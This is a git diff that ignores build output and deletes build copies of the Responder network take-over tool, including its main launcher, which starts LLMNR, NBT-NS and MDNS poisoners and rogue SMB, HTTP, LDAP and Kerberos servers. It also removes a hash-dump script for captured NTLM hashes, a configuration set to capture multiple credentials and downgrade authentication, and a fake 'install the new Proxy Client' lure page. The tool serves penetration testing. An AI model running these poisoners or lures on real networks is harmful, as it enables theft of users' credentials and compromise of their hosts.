diff --git a/.gitignore b/.gitignore index 238411b..64130fb 100644 --- a/.gitignore +++ b/.gitignore @@ -9,3 +9,6 @@ # Generated certificates and keys certs/*.crt certs/*.key + +build/* +responder.eg-info/* diff --git a/build/lib/Responder/DumpHash.py b/build/lib/Responder/DumpHash.py deleted file mode 100644 index daf0382..0000000 --- a/build/lib/Responder/DumpHash.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python3 -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sqlite3 - -def DumpHashToFile(outfile, data): - with open(outfile,"w") as dump: - dump.write(data) - -def DbConnect(): - cursor = sqlite3.connect("./Responder.db") - return cursor - -def GetResponderCompleteNTLMv2Hash(cursor): - res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") - Output = "" - for row in res.fetchall(): - if "$" in row[0]: - pass - else: - Output += '{0}'.format(row[0])+'\n' - return Output - -def GetResponderCompleteNTLMv1Hash(cursor): - res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") - Output = "" - for row in res.fetchall(): - if "$" in row[0]: - pass - else: - Output += '{0}'.format(row[0])+'\n' - return Output - -cursor = DbConnect() -print("Dumping NTLMV2 hashes:") -v2 = GetResponderCompleteNTLMv2Hash(cursor) -DumpHashToFile("DumpNTLMv2.txt", v2) -print(v2) -print("\nDumping NTLMv1 hashes:") -v1 = GetResponderCompleteNTLMv1Hash(cursor) -DumpHashToFile("DumpNTLMv1.txt", v1) -print(v1) diff --git a/build/lib/Responder/Report.py b/build/lib/Responder/Report.py deleted file mode 100644 index ff09e16..0000000 --- a/build/lib/Responder/Report.py +++ /dev/null @@ -1,127 +0,0 @@ -#!/usr/bin/env python3 -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import sqlite3 -import os - -def color(txt, code = 1, modifier = 0): - if txt.startswith('[*]'): - settings.Config.PoisonersLogger.warning(txt) - elif 'Analyze' in txt: - settings.Config.AnalyzeLogger.warning(txt) - - if os.name == 'nt': # No colors for windows... - return txt - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) - -def DbConnect(): - cursor = sqlite3.connect("./Responder.db") - return cursor - -def FingerDbConnect(): - cursor = sqlite3.connect("./tools/RunFinger.db") - return cursor - -def GetResponderData(cursor): - res = cursor.execute("SELECT * FROM Responder") - for row in res.fetchall(): - print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8])) - -def GetResponderUsernamesStatistic(cursor): - res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder") - for row in res.fetchall(): - print(color('\n[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)) - -def GetResponderUsernames(cursor): - res = cursor.execute("SELECT DISTINCT user FROM Responder") - for row in res.fetchall(): - print('User account: {0}'.format(row[0])) - -def GetResponderUsernamesWithDetails(cursor): - res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client") - for row in res.fetchall(): - print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3])) - - -def GetResponderCompleteHash(cursor): - res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") - for row in res.fetchall(): - print('{0}'.format(row[0])) - -def GetUniqueLookupsIP(cursor): - res = cursor.execute("SELECT Poisoner, SentToIp FROM Poisoned WHERE Poisoner in (SELECT DISTINCT UPPER(Poisoner) FROM Poisoned)") - for row in res.fetchall(): - if 'fe80::' in row[1]: - pass - else: - print('Protocol: {0}, IP: {1}'.format(row[0], row[1])) - -def GetUniqueLookups(cursor): - res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner") - for row in res.fetchall(): - print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3])) - -def GetUniqueDHCP(cursor): - res = cursor.execute("SELECT * FROM DHCP WHERE MAC in (SELECT DISTINCT UPPER(MAC) FROM DHCP)") - for row in res.fetchall(): - print('MAC: {0}, IP: {1}, RequestedIP: {2}'.format(row[1], row[2], row[3])) - -def GetRunFinger(cursor): - res = cursor.execute("SELECT * FROM RunFinger WHERE Host in (SELECT DISTINCT Host FROM RunFinger)") - for row in res.fetchall(): - print(("{},['{}', Os:'{}', Build:'{}', Domain:'{}', Bootime:'{}', Signing:'{}', Null Session: '{}', RDP:'{}', SMB1:'{}', MSSQL:'{}']".format(row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9], row[10], row[11]))) - -def GetStatisticUniqueLookups(cursor): - res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)") - for row in res.fetchall(): - print(color('\n[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)) - - -def SavePoisonersToDb(result): - - for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']: - if not k in result: - result[k] = '' - -def SaveToDb(result): - - for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]: - if not k in result: - result[k] = '' - -cursor = DbConnect() -print(color("[+] Generating report...\n", code = 3, modifier = 1)) - -print(color("[+] DHCP Query Poisoned:", code = 2, modifier = 1)) -GetUniqueDHCP(cursor) -print(color("\n[+] Unique IP using legacy protocols:", code = 2, modifier = 1)) -GetUniqueLookupsIP(cursor) -print(color("\n[+] Unique lookups ordered by IP:", code = 2, modifier = 1)) -GetUniqueLookups(cursor) -GetStatisticUniqueLookups(cursor) -print(color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)) -GetResponderUsernames(cursor) -print(color("\n[+] Username details:", code = 2, modifier = 1)) -GetResponderUsernamesWithDetails(cursor) -GetResponderUsernamesStatistic(cursor) -print (color("\n[+] RunFinger Scanned Hosts:", code = 2, modifier = 1)) -cursor.close() -try: - cursor = FingerDbConnect() - GetRunFinger(cursor) -except: - pass -print('\n') diff --git a/build/lib/Responder/Responder.conf b/build/lib/Responder/Responder.conf deleted file mode 100755 index 180e94f..0000000 --- a/build/lib/Responder/Responder.conf +++ /dev/null @@ -1,111 +0,0 @@ -[Responder Core] - -; Poisoners to start -MDNS = On -LLMNR = On -NBTNS = On - -; Servers to start -SQL = On -SMB = On -RDP = On -Kerberos = On -FTP = On -POP = On -SMTP = On -IMAP = On -HTTP = On -HTTPS = On -DNS = On -LDAP = On -DCERPC = On -WINRM = On -SNMP = Off -MQTT = On - -; Custom challenge. -; Use "Random" for generating a random challenge for each requests (Default) -Challenge = Random - -; SQLite Database file -; Delete this file to re-capture previously captured hashes -Database = Responder.db - -; Default log file -SessionLog = Responder-Session.log - -; Poisoners log -PoisonersLog = Poisoners-Session.log - -; Analyze mode log -AnalyzeLog = Analyzer-Session.log - -; Dump Responder Config log: -ResponderConfigDump = Config-Responder.log - -; Specific IP Addresses to respond to (default = All) -; Example: RespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334 -RespondTo = - -; Specific NBT-NS/LLMNR names to respond to (default = All) -; Example: RespondTo = WPAD, DEV, PROD, SQLINT -;RespondToName = WPAD, DEV, PROD, SQLINT -RespondToName = - -; Specific IP Addresses not to respond to (default = None) -; Hosts with IPv4 and IPv6 addresses must have both addresses included to prevent responding. -; Example: DontRespondTo = 10.20.1.100-150, 10.20.3.10, fe80::e059:5c8f:a486:a4ea-a4ef, 2001:db8::8a2e:370:7334 -DontRespondTo = - -; Specific NBT-NS/LLMNR names not to respond to (default = None) -; Example: DontRespondTo = NAC, IPS, IDS -DontRespondToName = ISATAP - -; If set to On, we will stop answering further requests from a host -; if a hash has been previously captured for this host. -AutoIgnoreAfterSuccess = Off - -; If set to On, we will send ACCOUNT_DISABLED when the client tries -; to authenticate for the first time to try to get different credentials. -; This may break file serving and is useful only for hash capture -CaptureMultipleCredentials = On - -; If set to On, we will write to file all hashes captured from the same host. -; In this case, Responder will log from 172.16.0.12 all user hashes: domain\toto, -; domain\popo, domain\zozo. Recommended value: On, capture everything. -CaptureMultipleHashFromSameHost = On - -[HTTP Server] - -; Set to On to always serve the custom EXE -Serve-Always = Off - -; Set to On to replace any requested .exe with the custom EXE -Serve-Exe = Off - -; Set to On to serve the custom HTML if the URL does not contain .exe -; Set to Off to inject the 'HTMLToInject' in web pages instead -Serve-Html = Off - -; Custom HTML to serve -HtmlFilename = files/AccessDenied.html - -; Custom EXE File to serve -ExeFilename = ;files/filetoserve.exe - -; Name of the downloaded .exe that the client will see -ExeDownloadName = ProxyClient.exe - -; Custom WPAD Script -; Only set one if you really know what you're doing. Responder is taking care of that and inject the right one, with your current IP address. -WPADScript = - -; HTML answer to inject in HTTP responses (before tag). -; leave empty if you want to use the default one (redirect to SMB on your IP address). -HTMLToInject = - -[HTTPS Server] - -; Configure SSL Certificates to use -SSLCert = certs/responder.crt -SSLKey = certs/responder.key diff --git a/build/lib/Responder/Responder.py b/build/lib/Responder/Responder.py deleted file mode 100644 index 3cf68b3..0000000 --- a/build/lib/Responder/Responder.py +++ /dev/null @@ -1,430 +0,0 @@ -#!/usr/bin/env python3 -# This file is part of Responder, a network take-over set of tools -# created and maintained by Laurent Gaffie. -# email: laurent.gaffie@gmail.com -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -import optparse -import ssl -try: - from SocketServer import TCPServer, UDPServer, ThreadingMixIn -except: - from socketserver import TCPServer, UDPServer, ThreadingMixIn -from threading import Thread -from Responder.utils import * -import struct -import Responder.settings as settings -banner() - -parser = optparse.OptionParser(usage='python %prog -I eth0 -w -d\nor:\npython %prog -I eth0 -wd', version=settings.__version__, prog=sys.argv[0]) -parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests without responding.", dest="Analyze", default=False) -parser.add_option('-I','--interface', action="store", help="Network interface to use, you can use 'ALL' as a wildcard for all interfaces", dest="Interface", metavar="eth0", default=None) -parser.add_option('-i','--ip', action="store", help="Local IP to use \033[1m\033[31m(only for OSX)\033[0m", dest="OURIP", metavar="10.0.0.21", default=None) -parser.add_option('-6', "--externalip6", action="store", help="Poison all requests with another IPv6 address than Responder's one.", dest="ExternalIP6", metavar="2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed", default=None) -parser.add_option('-e', "--externalip", action="store", help="Poison all requests with another IP address than Responder's one.", dest="ExternalIP", metavar="10.0.0.22", default=None) -parser.add_option('-b', '--basic', action="store_true", help="Return a Basic HTTP authentication. Default: NTLM", dest="Basic", default=False) -parser.add_option('-d', '--DHCP', action="store_true", help="Enable answers for DHCP broadcast requests. This option will inject a WPAD server in the DHCP response. Default: False", dest="DHCP_On_Off", default=False) -parser.add_option('-D', '--DHCP-DNS', action="store_true", help="This option will inject a DNS server in the DHCP response, otherwise a WPAD server will be added. Default: False", dest="DHCP_DNS", default=False) - -parser.add_option('-w','--wpad', action="store_true", help="Start the WPAD rogue proxy server. Default value is False", dest="WPAD_On_Off", default=False) -parser.add_option('-u','--upstream-proxy', action="store", help="Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)", dest="Upstream_Proxy", default=None) -parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval. This may cause a login prompt. Default: False", dest="Force_WPAD_Auth", default=False) - -parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective. Default: False", dest="ProxyAuth_On_Off", default=False) -parser.add_option('-Q','--quiet', action="store_true", help="Tell Responder to be quiet, disables a bunch of printing from the poisoners. Default: False", dest="Quiet", default=False) - -parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) -parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) -parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") -parser.add_option('-t','--ttl', action="store", help="Change the default Windows TTL for poisoned answers. Value in hex (30 seconds = 1e). use '-t random' for random TTL", dest="TTL", metavar="1e", default=None) -options, args = parser.parse_args() - -if not os.geteuid() == 0: - print(color("[!] Responder must be run as root.")) - sys.exit(-1) -elif options.OURIP == None and IsOsX() == True: - print("\n\033[1m\033[31mOSX detected, -i mandatory option is missing\033[0m\n") - parser.print_help() - exit(-1) - -elif options.ProxyAuth_On_Off and options.WPAD_On_Off: - print("\n\033[1m\033[31mYou cannot use WPAD server and Proxy_Auth server at the same time, choose one of them.\033[0m\n") - exit(-1) - -settings.init() -settings.Config.populate(options) - -StartupMessage() - -settings.Config.ExpandIPRanges() - -#Create the DB, before we start Responder. -CreateResponderDb() - -Have_IPv6 = settings.Config.IPv6 - -class ThreadingUDPServer(ThreadingMixIn, UDPServer): - def server_bind(self): - if OsInterfaceIsSupported(): - try: - if settings.Config.Bind_To_ALL: - pass - else: - if (sys.version_info > (3, 0)): - self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - except: - pass - UDPServer.server_bind(self) - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - def server_bind(self): - if OsInterfaceIsSupported(): - try: - if settings.Config.Bind_To_ALL: - pass - else: - if (sys.version_info > (3, 0)): - self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - except: - pass - TCPServer.server_bind(self) - -class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer): - def server_bind(self): - if OsInterfaceIsSupported(): - try: - if settings.Config.Bind_To_ALL: - pass - else: - if (sys.version_info > (3, 0)): - self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - except: - pass - self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) - TCPServer.server_bind(self) - -class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): - def server_bind(self): - MADDR = "224.0.0.251" - MADDR6 = 'ff02::fb' - self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1) - self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton) - - #IPV6: - if (sys.version_info > (3, 0)): - if Have_IPv6: - mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) - else: - if Have_IPv6: - mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) - if OsInterfaceIsSupported(): - try: - if settings.Config.Bind_To_ALL: - pass - else: - if (sys.version_info > (3, 0)): - self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - except: - pass - UDPServer.server_bind(self) - -class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): - def server_bind(self): - MADDR = '224.0.0.252' - MADDR6 = 'FF02:0:0:0:0:0:1:3' - self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) - self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton) - - #IPV6: - if Have_IPv6: - mreq = socket.inet_pton(socket.AF_INET6, MADDR6) + struct.pack('@I', if_nametoindex2(settings.Config.Interface)) - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq) - if OsInterfaceIsSupported(): - try: - if settings.Config.Bind_To_ALL: - pass - else: - if (sys.version_info > (3, 0)): - self.socket.setsockopt(socket.SOL_SOCKET, 25, bytes(settings.Config.Interface+'\0', 'utf-8')) - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - else: - self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0') - if Have_IPv6: - self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, False) - except: - pass - UDPServer.server_bind(self) - - -ThreadingUDPServer.allow_reuse_address = 1 -if Have_IPv6: - ThreadingUDPServer.address_family = socket.AF_INET6 - -ThreadingTCPServer.allow_reuse_address = 1 -if Have_IPv6: - ThreadingTCPServer.address_family = socket.AF_INET6 - -ThreadingUDPMDNSServer.allow_reuse_address = 1 -if Have_IPv6: - ThreadingUDPMDNSServer.address_family = socket.AF_INET6 - -ThreadingUDPLLMNRServer.allow_reuse_address = 1 -if Have_IPv6: - ThreadingUDPLLMNRServer.address_family = socket.AF_INET6 - -ThreadingTCPServerAuth.allow_reuse_address = 1 -if Have_IPv6: - ThreadingTCPServerAuth.address_family = socket.AF_INET6 - -def serve_thread_udp_broadcast(host, port, handler): - try: - server = ThreadingUDPServer(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_NBTNS_poisoner(host, port, handler): - serve_thread_udp_broadcast('', port, handler) - -def serve_MDNS_poisoner(host, port, handler): - try: - server = ThreadingUDPMDNSServer(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_LLMNR_poisoner(host, port, handler): - try: - server = ThreadingUDPLLMNRServer(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_thread_udp(host, port, handler): - try: - if OsInterfaceIsSupported(): - server = ThreadingUDPServer(('', port), handler) - server.serve_forever() - else: - server = ThreadingUDPServer(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_thread_tcp(host, port, handler): - try: - if OsInterfaceIsSupported(): - server = ThreadingTCPServer(('', port), handler) - server.serve_forever() - else: - server = ThreadingTCPServer(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_thread_tcp_auth(host, port, handler): - try: - if OsInterfaceIsSupported(): - server = ThreadingTCPServerAuth(('', port), handler) - server.serve_forever() - else: - server = ThreadingTCPServerAuth(('', port), handler) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting TCP server on port " + str(port) + ", check permissions or other servers running.") - -def serve_thread_SSL(host, port, handler): - try: - cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert) - key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey) - context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) - context.load_cert_chain(cert, key) - if OsInterfaceIsSupported(): - server = ThreadingTCPServer(('', port), handler) - server.socket = context.wrap_socket(server.socket, server_side=True) - server.serve_forever() - else: - server = ThreadingTCPServer(('', port), handler) - server.socket = context.wrap_socket(server.socket, server_side=True) - server.serve_forever() - except: - print(color("[!] ", 1, 1) + "Error starting SSL server on port " + str(port) + ", check permissions or other servers running.") - - -def main(): - try: - if (sys.version_info < (3, 0)): - print(color('\n\n[-]', 3, 1) + " Still using python 2? :(") - print(color('\n[+]', 2, 1) + " Listening for events...\n") - - threads = [] - - # Load (M)DNS, NBNS and LLMNR Poisoners - if settings.Config.LLMNR_On_Off: - from Responder.poisoners.LLMNR import LLMNR - threads.append(Thread(target=serve_LLMNR_poisoner, args=('', 5355, LLMNR,))) - - if settings.Config.NBTNS_On_Off: - from Responder.poisoners.NBTNS import NBTNS - threads.append(Thread(target=serve_NBTNS_poisoner, args=('', 137, NBTNS,))) - - if settings.Config.MDNS_On_Off: - from Responder.poisoners.MDNS import MDNS - threads.append(Thread(target=serve_MDNS_poisoner, args=('', 5353, MDNS,))) - - #// Vintage Responder BOWSER module, now disabled by default. - #// Generate to much noise & easily detectable on the network when in analyze mode. - # Load Browser Listener - #from Responder.servers.Browser import Browser - #threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 138, Browser,))) - - if settings.Config.HTTP_On_Off: - from Responder.servers.HTTP import HTTP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 80, HTTP,))) - - if settings.Config.WinRM_On_Off: - from Responder.servers.WinRM import WinRM - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 5985, WinRM,))) - - if settings.Config.WinRM_On_Off: - from Responder.servers.WinRM import WinRM - threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 5986, WinRM,))) - - if settings.Config.SSL_On_Off: - from Responder.servers.HTTP import HTTP - threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 443, HTTP,))) - - if settings.Config.RDP_On_Off: - from Responder.servers.RDP import RDP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3389, RDP,))) - - if settings.Config.DCERPC_On_Off: - from Responder.servers.RPC import RPCMap, RPCMapper - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 135, RPCMap,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, settings.Config.RPCPort, RPCMapper,))) - - if settings.Config.WPAD_On_Off: - from Responder.servers.HTTP_Proxy import HTTP_Proxy - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 3128, HTTP_Proxy,))) - - if settings.Config.ProxyAuth_On_Off: - from Responder.servers.Proxy_Auth import Proxy_Auth - threads.append(Thread(target=serve_thread_tcp_auth, args=(settings.Config.Bind_To, 3128, Proxy_Auth,))) - - if settings.Config.SMB_On_Off: - if settings.Config.LM_On_Off: - from Responder.servers.SMB import SMB1LM - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1LM,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1LM,))) - else: - from Responder.servers.SMB import SMB1 - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 445, SMB1,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 139, SMB1,))) - - if settings.Config.Krb_On_Off: - from Responder.servers.Kerberos import KerbTCP, KerbUDP - threads.append(Thread(target=serve_thread_udp, args=('', 88, KerbUDP,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 88, KerbTCP,))) - - if settings.Config.SQL_On_Off: - from Responder.servers.MSSQL import MSSQL, MSSQLBrowser - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1433, MSSQL,))) - threads.append(Thread(target=serve_thread_udp_broadcast, args=(settings.Config.Bind_To, 1434, MSSQLBrowser,))) - - if settings.Config.FTP_On_Off: - from Responder.servers.FTP import FTP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 21, FTP,))) - - if settings.Config.POP_On_Off: - from Responder.servers.POP3 import POP3 - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 110, POP3,))) - - if settings.Config.LDAP_On_Off: - from Responder.servers.LDAP import LDAP, CLDAP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 389, LDAP,))) - threads.append(Thread(target=serve_thread_SSL, args=(settings.Config.Bind_To, 636, LDAP,))) - threads.append(Thread(target=serve_thread_udp, args=('', 389, CLDAP,))) - - if settings.Config.MQTT_On_Off: - from Responder.servers.MQTT import MQTT - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 1883, MQTT,))) - - if settings.Config.SMTP_On_Off: - from Responder.servers.SMTP import ESMTP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25, ESMTP,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,))) - - if settings.Config.IMAP_On_Off: - from Responder.servers.IMAP import IMAP - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,))) - - if settings.Config.DNS_On_Off: - from Responder.servers.DNS import DNS, DNSTCP - threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,))) - threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,))) - - if settings.Config.SNMP_On_Off: - from Responder.servers.SNMP import SNMP - threads.append(Thread(target=serve_thread_udp, args=('', 161, SNMP,))) - - for thread in threads: - thread.daemon = True - thread.start() - - if settings.Config.AnalyzeMode: - print(color('[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)) - if settings.Config.Quiet_Mode: - print(color('[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.', 3, 1)) - - - if settings.Config.DHCP_On_Off: - from Responder.poisoners.DHCP import DHCP - DHCP(settings.Config.DHCP_DNS) - - while True: - time.sleep(1) - - except KeyboardInterrupt: - sys.exit("\r%s Exiting..." % color('[+]', 2, 1)) - -if __name__ == '__main__': - main() diff --git a/build/lib/Responder/certs/gen-self-signed-cert.sh b/build/lib/Responder/certs/gen-self-signed-cert.sh deleted file mode 100755 index b5a18a9..0000000 --- a/build/lib/Responder/certs/gen-self-signed-cert.sh +++ /dev/null @@ -1,4 +0,0 @@ -#!/bin/bash -CERT_PATH=$1 -openssl genrsa -out "$CERT_PATH/certs/responder.key" 2048 -openssl req -new -x509 -days 3650 -key "$CERT_PATH/certs/responder.key" -out "$CERT_PATH/certs/responder.crt" -subj "/" diff --git a/build/lib/Responder/files/AccessDenied.html b/build/lib/Responder/files/AccessDenied.html deleted file mode 100644 index d79f811..0000000 --- a/build/lib/Responder/files/AccessDenied.html +++ /dev/null @@ -1,31 +0,0 @@ - - -Website Blocked: ISA Proxy Server - - - - -
-
-
New Security Policy: Website Blocked
-
    -
    -
    -
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
  • -
    -
-
- -
